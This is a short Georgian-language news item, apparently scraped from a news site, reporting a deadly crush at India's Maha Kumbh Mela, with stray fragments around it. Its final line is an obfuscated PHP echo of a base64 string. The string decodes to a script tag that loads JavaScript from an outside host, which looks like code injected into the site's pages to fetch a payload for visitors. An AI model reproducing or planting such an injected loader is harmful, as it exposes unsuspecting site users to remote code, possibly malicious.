tube
ავერსი jaluzi

ინდოეთში, მაჰა კუმბ მელას რელიგიურ დღესასწაულზე, სადაც მილიონობით მომლოცველი იყო შეკრებილი, ჭყლეტა მოხდა, რის შედეგადაც, მინიმუმ 7 ადამიანი დაიღუპა და 10 - დაშავდა, - ინფორმაციას Reuters-ი ავრცელებს.

გავრცელებული ინფორმაციით, ჭყლეტა მაშინ მოხდა, როდესაც მდინარეში განბანის ცერემონია მიმდინარეობდა.

სიტუაციის კონტროლის მიზნით და სამაშველო სამუშაოებისთვის სწრაფი მოქმედების ძალები განათავსეს.

პრემიერ-მინისტრი ნარენდრა მოდი უტარ პრადეშის მთავარ მინისტრს, იოგი ადიტიანათს ესაუბრა და დაუყოვნებელი მხარდაჭერის ზომების მიღებისკენ მოუწოდა.

73
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");